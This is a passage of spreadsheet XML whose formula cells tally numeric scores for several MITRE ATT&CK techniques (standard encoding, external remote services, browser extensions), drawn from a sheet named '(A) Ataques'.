        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!CX32,"")</f>
        <v>26</v>
      </c>
      <c r="AU32" s="392">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!CZ32,"")</f>
        <v>9</v>
      </c>
      <c r="AV32" s="4">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!DB32,"")</f>
        <v>3</v>
      </c>
      <c r="AW32" s="20">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",'(A) Ataques'!DC32,"")</f>
        <v>5</v>
      </c>
      <c r="AX32" s="331">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($AT32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY32" s="469">
        <f>'(A) Ataques'!LU32+'(A) Ataques'!MA32+'(A) Ataques'!MG32+'(A) Ataques'!MM32+'(A) Ataques'!MS32</f>
        <v>12</v>
      </c>
      <c r="AZ32" s="510">
        <f>'(A) Ataques'!LW32+'(A) Ataques'!MC32+'(A) Ataques'!MI32+'(A) Ataques'!MO32+'(A) Ataques'!MU32</f>
        <v>6</v>
      </c>
      <c r="BA32" s="471">
        <f>'(A) Ataques'!LY32+'(A) Ataques'!ME32+'(A) Ataques'!MK32+'(A) Ataques'!MQ32+'(A) Ataques'!MW32</f>
        <v>3</v>
      </c>
      <c r="BB32" s="471">
        <f>'(A) Ataques'!LQ32</f>
        <v>4</v>
      </c>
      <c r="BC32" s="331">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($AY32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD32" s="469">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!LL32,"")</f>
        <v>19</v>
      </c>
      <c r="BE32" s="510">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!LM32,"")</f>
        <v>13</v>
      </c>
      <c r="BF32" s="471">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!LN32,"")</f>
        <v>3</v>
      </c>
      <c r="BG32" s="471">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!LO32,"")</f>
        <v>4</v>
      </c>
      <c r="BH32" s="471">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!LS32,"")</f>
        <v>9</v>
      </c>
      <c r="BI32" s="331">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($BD32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ32" s="469">
        <f>'(A) Ataques'!OL32+'(A) Ataques'!OR32+'(A) Ataques'!OX32+'(A) Ataques'!PD32+'(A) Ataques'!PJ32</f>
        <v>5</v>
      </c>
      <c r="BK32" s="510">
        <f>'(A) Ataques'!ON32+'(A) Ataques'!OT32+'(A) Ataques'!OZ32+'(A) Ataques'!PF32+'(A) Ataques'!PL32</f>
        <v>5</v>
      </c>
      <c r="BL32" s="471">
        <f>'(A) Ataques'!OP32+'(A) Ataques'!OV32+'(A) Ataques'!PB32+'(A) Ataques'!PH32+'(A) Ataques'!PN32</f>
        <v>4</v>
      </c>
      <c r="BM32" s="495">
        <f>'(A) Ataques'!OH32</f>
        <v>4</v>
      </c>
      <c r="BN32" s="331">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($BJ32=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO32" s="469">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!OC32,"")</f>
        <v>5</v>
      </c>
      <c r="BP32" s="510">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!OD32,"")</f>
        <v>5</v>
      </c>
      <c r="BQ32" s="471">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!OE32,"")</f>
        <v>4</v>
      </c>
      <c r="BR32" s="471">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!OF32,"")</f>
        <v>4</v>
      </c>
      <c r="BS32" s="471">
        <f>IF('(A) Ataques'!$AP32&lt;&gt;"NO",'(A) Ataques'!OJ32,"")</f>
        <v>4</v>
      </c>
      <c r="BT32" s="331">
        <f>IF('(A) Ataques'!$AK32&lt;&gt;"NO",IF($BO32=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A33" s="79">
        <f t="shared" si="0"/>
        <v>31</v>
      </c>
      <c r="B33" s="4">
        <f>IF('(A) Ataques'!AK33&lt;&gt;"NO",'(A) Ataques'!E33,"")</f>
        <v>27</v>
      </c>
      <c r="C33" s="6" t="str">
        <f>IF('(A) Ataques'!AK33&lt;&gt;"NO",IF('(A) Ataques'!M33="","",'(A) Ataques'!M33),"")</f>
        <v>T1132.001-Standard_Encoding</v>
      </c>
      <c r="D33" s="4" t="str">
        <f>IF('(A) Ataques'!AK33&lt;&gt;"NO",'(A) Ataques'!F33,"")</f>
        <v>T1132</v>
      </c>
      <c r="E33" s="286">
        <f>IF('(A) Ataques'!AK33&lt;&gt;"NO",'(A) Ataques'!AQ33,"")</f>
        <v>10</v>
      </c>
      <c r="F33" s="288">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!BB33,"")</f>
        <v>1</v>
      </c>
      <c r="G33" s="392">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!BD33,"")</f>
        <v>1</v>
      </c>
      <c r="H33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!BF33,"")</f>
        <v>1</v>
      </c>
      <c r="I33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!BG33,"")</f>
        <v>1</v>
      </c>
      <c r="J33" s="530">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($F33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BH33,"")</f>
        <v>11</v>
      </c>
      <c r="L33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BJ33,"")</f>
        <v>11</v>
      </c>
      <c r="M33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BL33,"")</f>
        <v>3</v>
      </c>
      <c r="N33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BM33,"")</f>
        <v>6</v>
      </c>
      <c r="O33" s="532">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($K33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P33" s="292">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BN33,"")</f>
        <v>12</v>
      </c>
      <c r="Q33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BP33,"")</f>
        <v>12</v>
      </c>
      <c r="R33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BR33,"")</f>
        <v>4</v>
      </c>
      <c r="S33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BS33,"")</f>
        <v>6</v>
      </c>
      <c r="T33" s="530">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($P33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BT33,"")</f>
        <v>6</v>
      </c>
      <c r="V33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BV33,"")</f>
        <v>6</v>
      </c>
      <c r="W33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BX33,"")</f>
        <v>2</v>
      </c>
      <c r="X33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$BY33,"")</f>
        <v>6</v>
      </c>
      <c r="Y33" s="532">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($U33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z33" s="288">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!BZ33,"")</f>
        <v>20</v>
      </c>
      <c r="AA33" s="392">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!CB33,"")</f>
        <v>18</v>
      </c>
      <c r="AB33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!CD33,"")</f>
        <v>6</v>
      </c>
      <c r="AC33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!CE33,"")</f>
        <v>6</v>
      </c>
      <c r="AD33" s="331">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF(Z33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CF33,"")</f>
        <v>26</v>
      </c>
      <c r="AF33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CH33,"")</f>
        <v>24</v>
      </c>
      <c r="AG33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CJ33,"")</f>
        <v>8</v>
      </c>
      <c r="AH33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CK33,"")</f>
        <v>6</v>
      </c>
      <c r="AI33" s="287">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($AE33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ33" s="292">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CL33,"")</f>
        <v>0</v>
      </c>
      <c r="AK33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CN33,"")</f>
        <v>0</v>
      </c>
      <c r="AL33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CP33,"")</f>
        <v>0</v>
      </c>
      <c r="AM33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CQ33,"")</f>
        <v>0</v>
      </c>
      <c r="AN33" s="331">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($AJ33=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CR33,"")</f>
        <v>0</v>
      </c>
      <c r="AP33" s="322">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CT33,"")</f>
        <v>0</v>
      </c>
      <c r="AQ33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CV33,"")</f>
        <v>0</v>
      </c>
      <c r="AR33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!$CW33,"")</f>
        <v>0</v>
      </c>
      <c r="AS33" s="287">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($AO33=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT33" s="288">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!CX33,"")</f>
        <v>12</v>
      </c>
      <c r="AU33" s="392">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!CZ33,"")</f>
        <v>12</v>
      </c>
      <c r="AV33" s="4">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!DB33,"")</f>
        <v>4</v>
      </c>
      <c r="AW33" s="20">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",'(A) Ataques'!DC33,"")</f>
        <v>6</v>
      </c>
      <c r="AX33" s="331">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($AT33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY33" s="469">
        <f>'(A) Ataques'!LU33+'(A) Ataques'!MA33+'(A) Ataques'!MG33+'(A) Ataques'!MM33+'(A) Ataques'!MS33</f>
        <v>2</v>
      </c>
      <c r="AZ33" s="510">
        <f>'(A) Ataques'!LW33+'(A) Ataques'!MC33+'(A) Ataques'!MI33+'(A) Ataques'!MO33+'(A) Ataques'!MU33</f>
        <v>2</v>
      </c>
      <c r="BA33" s="471">
        <f>'(A) Ataques'!LY33+'(A) Ataques'!ME33+'(A) Ataques'!MK33+'(A) Ataques'!MQ33+'(A) Ataques'!MW33</f>
        <v>2</v>
      </c>
      <c r="BB33" s="471">
        <f>'(A) Ataques'!LQ33</f>
        <v>1</v>
      </c>
      <c r="BC33" s="331">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($AY33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD33" s="469">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!LL33,"")</f>
        <v>10</v>
      </c>
      <c r="BE33" s="510">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!LM33,"")</f>
        <v>10</v>
      </c>
      <c r="BF33" s="471">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!LN33,"")</f>
        <v>2</v>
      </c>
      <c r="BG33" s="471">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!LO33,"")</f>
        <v>3</v>
      </c>
      <c r="BH33" s="471">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!LS33,"")</f>
        <v>9</v>
      </c>
      <c r="BI33" s="331">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($BD33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ33" s="469">
        <f>'(A) Ataques'!OL33+'(A) Ataques'!OR33+'(A) Ataques'!OX33+'(A) Ataques'!PD33+'(A) Ataques'!PJ33</f>
        <v>5</v>
      </c>
      <c r="BK33" s="510">
        <f>'(A) Ataques'!ON33+'(A) Ataques'!OT33+'(A) Ataques'!OZ33+'(A) Ataques'!PF33+'(A) Ataques'!PL33</f>
        <v>5</v>
      </c>
      <c r="BL33" s="471">
        <f>'(A) Ataques'!OP33+'(A) Ataques'!OV33+'(A) Ataques'!PB33+'(A) Ataques'!PH33+'(A) Ataques'!PN33</f>
        <v>1</v>
      </c>
      <c r="BM33" s="495">
        <f>'(A) Ataques'!OH33</f>
        <v>5</v>
      </c>
      <c r="BN33" s="331">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($BJ33=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO33" s="469">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!OC33,"")</f>
        <v>5</v>
      </c>
      <c r="BP33" s="510">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!OD33,"")</f>
        <v>5</v>
      </c>
      <c r="BQ33" s="471">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!OE33,"")</f>
        <v>1</v>
      </c>
      <c r="BR33" s="471">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!OF33,"")</f>
        <v>1</v>
      </c>
      <c r="BS33" s="471">
        <f>IF('(A) Ataques'!$AP33&lt;&gt;"NO",'(A) Ataques'!OJ33,"")</f>
        <v>5</v>
      </c>
      <c r="BT33" s="331">
        <f>IF('(A) Ataques'!$AK33&lt;&gt;"NO",IF($BO33=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A34" s="79">
        <f t="shared" si="0"/>
        <v>32</v>
      </c>
      <c r="B34" s="4">
        <f>IF('(A) Ataques'!AK34&lt;&gt;"NO",'(A) Ataques'!E34,"")</f>
        <v>28</v>
      </c>
      <c r="C34" s="6" t="str">
        <f>IF('(A) Ataques'!AK34&lt;&gt;"NO",IF('(A) Ataques'!M34="","",'(A) Ataques'!M34),"")</f>
        <v>T1133-External_remote_services</v>
      </c>
      <c r="D34" s="4" t="str">
        <f>IF('(A) Ataques'!AK34&lt;&gt;"NO",'(A) Ataques'!F34,"")</f>
        <v>T1133</v>
      </c>
      <c r="E34" s="286">
        <f>IF('(A) Ataques'!AK34&lt;&gt;"NO",'(A) Ataques'!AQ34,"")</f>
        <v>32</v>
      </c>
      <c r="F34" s="288">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!BB34,"")</f>
        <v>0</v>
      </c>
      <c r="G34" s="392">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!BD34,"")</f>
        <v>0</v>
      </c>
      <c r="H34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!BF34,"")</f>
        <v>0</v>
      </c>
      <c r="I34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!BG34,"")</f>
        <v>0</v>
      </c>
      <c r="J34" s="530">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($F34=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BH34,"")</f>
        <v>0</v>
      </c>
      <c r="L34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BJ34,"")</f>
        <v>0</v>
      </c>
      <c r="M34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BL34,"")</f>
        <v>0</v>
      </c>
      <c r="N34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BM34,"")</f>
        <v>0</v>
      </c>
      <c r="O34" s="532">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($K34=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P34" s="292">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BN34,"")</f>
        <v>0</v>
      </c>
      <c r="Q34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BP34,"")</f>
        <v>0</v>
      </c>
      <c r="R34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BR34,"")</f>
        <v>0</v>
      </c>
      <c r="S34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BS34,"")</f>
        <v>0</v>
      </c>
      <c r="T34" s="530">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($P34=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BT34,"")</f>
        <v>18</v>
      </c>
      <c r="V34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BV34,"")</f>
        <v>8</v>
      </c>
      <c r="W34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BX34,"")</f>
        <v>3</v>
      </c>
      <c r="X34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$BY34,"")</f>
        <v>8</v>
      </c>
      <c r="Y34" s="532">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($U34=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z34" s="288">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!BZ34,"")</f>
        <v>4</v>
      </c>
      <c r="AA34" s="392">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!CB34,"")</f>
        <v>3</v>
      </c>
      <c r="AB34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!CD34,"")</f>
        <v>2</v>
      </c>
      <c r="AC34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!CE34,"")</f>
        <v>3</v>
      </c>
      <c r="AD34" s="331">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF(Z34=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CF34,"")</f>
        <v>22</v>
      </c>
      <c r="AF34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CH34,"")</f>
        <v>11</v>
      </c>
      <c r="AG34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CJ34,"")</f>
        <v>5</v>
      </c>
      <c r="AH34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CK34,"")</f>
        <v>9</v>
      </c>
      <c r="AI34" s="287">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($AE34=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ34" s="292">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CL34,"")</f>
        <v>0</v>
      </c>
      <c r="AK34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CN34,"")</f>
        <v>0</v>
      </c>
      <c r="AL34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CP34,"")</f>
        <v>0</v>
      </c>
      <c r="AM34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CQ34,"")</f>
        <v>0</v>
      </c>
      <c r="AN34" s="331">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($AJ34=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CR34,"")</f>
        <v>14</v>
      </c>
      <c r="AP34" s="322">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CT34,"")</f>
        <v>5</v>
      </c>
      <c r="AQ34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CV34,"")</f>
        <v>2</v>
      </c>
      <c r="AR34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!$CW34,"")</f>
        <v>5</v>
      </c>
      <c r="AS34" s="287">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($AO34=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT34" s="288">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!CX34,"")</f>
        <v>14</v>
      </c>
      <c r="AU34" s="392">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!CZ34,"")</f>
        <v>5</v>
      </c>
      <c r="AV34" s="4">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!DB34,"")</f>
        <v>2</v>
      </c>
      <c r="AW34" s="20">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",'(A) Ataques'!DC34,"")</f>
        <v>5</v>
      </c>
      <c r="AX34" s="331">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($AT34=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY34" s="469">
        <f>'(A) Ataques'!LU34+'(A) Ataques'!MA34+'(A) Ataques'!MG34+'(A) Ataques'!MM34+'(A) Ataques'!MS34</f>
        <v>0</v>
      </c>
      <c r="AZ34" s="510">
        <f>'(A) Ataques'!LW34+'(A) Ataques'!MC34+'(A) Ataques'!MI34+'(A) Ataques'!MO34+'(A) Ataques'!MU34</f>
        <v>0</v>
      </c>
      <c r="BA34" s="471">
        <f>'(A) Ataques'!LY34+'(A) Ataques'!ME34+'(A) Ataques'!MK34+'(A) Ataques'!MQ34+'(A) Ataques'!MW34</f>
        <v>0</v>
      </c>
      <c r="BB34" s="471">
        <f>'(A) Ataques'!LQ34</f>
        <v>0</v>
      </c>
      <c r="BC34" s="331">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($AY34=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD34" s="469">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!LL34,"")</f>
        <v>32</v>
      </c>
      <c r="BE34" s="510">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!LM34,"")</f>
        <v>30</v>
      </c>
      <c r="BF34" s="471">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!LN34,"")</f>
        <v>0</v>
      </c>
      <c r="BG34" s="471">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!LO34,"")</f>
        <v>7</v>
      </c>
      <c r="BH34" s="471">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!LS34,"")</f>
        <v>30</v>
      </c>
      <c r="BI34" s="331">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($BD34=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ34" s="469">
        <f>'(A) Ataques'!OL34+'(A) Ataques'!OR34+'(A) Ataques'!OX34+'(A) Ataques'!PD34+'(A) Ataques'!PJ34</f>
        <v>0</v>
      </c>
      <c r="BK34" s="510">
        <f>'(A) Ataques'!ON34+'(A) Ataques'!OT34+'(A) Ataques'!OZ34+'(A) Ataques'!PF34+'(A) Ataques'!PL34</f>
        <v>0</v>
      </c>
      <c r="BL34" s="471">
        <f>'(A) Ataques'!OP34+'(A) Ataques'!OV34+'(A) Ataques'!PB34+'(A) Ataques'!PH34+'(A) Ataques'!PN34</f>
        <v>0</v>
      </c>
      <c r="BM34" s="495">
        <f>'(A) Ataques'!OH34</f>
        <v>0</v>
      </c>
      <c r="BN34" s="331">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($BJ34=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO34" s="469">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!OC34,"")</f>
        <v>0</v>
      </c>
      <c r="BP34" s="510">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!OD34,"")</f>
        <v>0</v>
      </c>
      <c r="BQ34" s="471">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!OE34,"")</f>
        <v>0</v>
      </c>
      <c r="BR34" s="471">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!OF34,"")</f>
        <v>0</v>
      </c>
      <c r="BS34" s="471">
        <f>IF('(A) Ataques'!$AP34&lt;&gt;"NO",'(A) Ataques'!OJ34,"")</f>
        <v>0</v>
      </c>
      <c r="BT34" s="331">
        <f>IF('(A) Ataques'!$AK34&lt;&gt;"NO",IF($BO34=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A35" s="79">
        <f t="shared" si="0"/>
        <v>33</v>
      </c>
      <c r="B35" s="4">
        <f>IF('(A) Ataques'!AK35&lt;&gt;"NO",'(A) Ataques'!E35,"")</f>
        <v>29</v>
      </c>
      <c r="C35" s="6" t="str">
        <f>IF('(A) Ataques'!AK35&lt;&gt;"NO",IF('(A) Ataques'!M35="","",'(A) Ataques'!M35),"")</f>
        <v>T1176-Browser-extension</v>
      </c>
      <c r="D35" s="4" t="str">
        <f>IF('(A) Ataques'!AK35&lt;&gt;"NO",'(A) Ataques'!F35,"")</f>
        <v>T1176</v>
      </c>
      <c r="E35" s="286">
        <f>IF('(A) Ataques'!AK35&lt;&gt;"NO",'(A) Ataques'!AQ35,"")</f>
        <v>217</v>
      </c>
      <c r="F35" s="288">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!BB35,"")</f>
        <v>0</v>
      </c>
      <c r="G35" s="392">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!BD35,"")</f>
        <v>0</v>
      </c>
      <c r="H35" s="4">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!BF35,"")</f>
        <v>0</v>
      </c>
      <c r="I35" s="20">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!BG35,"")</f>
        <v>0</v>
      </c>
      <c r="J35" s="530">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",IF($F35=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K35" s="322">
        <f>IF('(A) Ataques'!$AK35&lt;&gt;"NO",'(A) Ataques'!$BH35,"")</f>
        <v>0</v>
      </c>
      <c r="L35" s="322">
